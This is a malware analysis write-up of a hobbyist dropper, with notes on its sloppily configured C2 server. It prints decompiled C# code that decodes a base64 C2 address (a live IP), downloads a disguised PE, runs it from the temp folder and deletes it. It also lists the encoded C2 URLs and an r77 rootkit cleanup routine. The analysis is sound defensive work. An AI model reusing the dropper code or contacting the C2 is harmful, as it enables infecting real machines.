8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427 Malware Bazaar


  • Malware Sellix link
  • Karsten twitter ref
  • They have a tutorial video! video



The URLs are base64 encoded and link back to the C2 server. In this case the URL points to a .jpg file which is in fact a base64-encoded PE.

// Decompiled dropper routine: fetches a ".jpg" from the C2, base64-decodes it
// into a PE, drops it to %TEMP%\rkd.exe, runs it, then deletes the file.
private static void StopRootkit()
{
    WebClient webClient = new WebClient();
    // The C2 URL is stored base64 encoded and decoded at runtime.
    Stream stream = webClient.OpenRead(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=")));
    StreamReader streamReader = new StreamReader(stream);
    string s = streamReader.ReadToEnd();
    // The downloaded ".jpg" body is itself base64; the decoded bytes are the PE.
    byte[] bytes = Convert.FromBase64String(s);
    File.WriteAllBytes(Path.GetTempPath() + "\\rkd.exe", bytes);
    Process.Start(Path.GetTempPath() + "\\rkd.exe");
    File.Delete(Path.GetTempPath() + "\\rkd.exe");
}


  • aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc= ->
  • aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw== -> There are more...
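A small triage helper, added here as example code (not part of the original write-up or the sample), that decodes the base64 URL strings quoted above the way the dropper does and then checks whether a body served as a ".jpg" is really a base64-wrapped PE by looking for the MZ stub and the PE signature at e_lfanew. The payload inputs are constructed stand-ins, not data from the C2.

```python
import base64
import binascii
import struct

# Base64-encoded URL strings as they appear in the decompiled dropper (from the write-up).
ENCODED_URLS = [
    "aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=",
    "aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw==",
]

def decode_c2_url(encoded: str) -> str:
    """Mirror the dropper's Encoding.UTF8.GetString(Convert.FromBase64String(...))."""
    return base64.b64decode(encoded, validate=True).decode("utf-8")

def is_pe(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def classify_payload(body: bytes) -> str:
    """Classify a body served at a '.jpg' URL: real JPEG, base64-wrapped PE, or other."""
    if body.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    try:
        decoded = base64.b64decode(body.strip(), validate=True)
    except (binascii.Error, ValueError):
        return "unknown"
    return "base64-encoded PE" if is_pe(decoded) else "base64 (not PE)"

# Constructed inputs: a bare PE header stub (not an executable), a JPEG magic prefix, plain text.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
FAKE_PE_AS_JPG = base64.b64encode(FAKE_PE)
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
FAKE_TEXT_AS_B64 = base64.b64encode(b"just text, no MZ header")

if __name__ == "__main__":
    for enc in ENCODED_URLS:
        print(decode_c2_url(enc))
    print(classify_payload(FAKE_PE_AS_JPG))  # base64-encoded PE
    print(classify_payload(FAKE_JPEG))       # jpeg
```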

Downloaded Modules


Deletes the rootkit

// Decompiled module: clears the AppInit_DLLs registry value in both the
// 64-bit and 32-bit views if it references an r77 rootkit DLL.
public static void remove()
{
    try
    {
        // array[0] = true selects Registry64, array[1] (default false) selects Registry32.
        bool[] array = new bool[2];
        array[0] = true;
        foreach (bool flag in array)
        {
            using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, flag ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", true))
            {
                bool flag2 = (registryKey.GetValue("AppInit_DLLs", "") as string).Contains("r77-");
                if (flag2)
                {
                    registryKey.SetValue("AppInit_DLLs", "");
                }
            }
        }
    }
    catch (Exception ex)
    {
        // Handler body not present in the decompiled output.
    }
}


This is a simple startup function for an open source userland rootkit that can be found on GitHub (r77-rootkit).

Server Misconfiguration

It's almost like the developer knows they made some mistakes...

Laravel Debugger Exposed

A typo in one of the C2 URLs exposed a server error with a full stack trace. This revealed that the developer was using the Laravel PHP framework and had left the debugger publicly exposed.

Open Directory

The stack trace led to the discovery that the server root had been configured as an open directory with many files publicly served to the Internet including logs.

Analysis Stopped:

There are more files and download links that could be investigated, but the malware is so simple and the server so poorly configured that we stopped our analysis. This malware looks more like a hobby project than a professional business...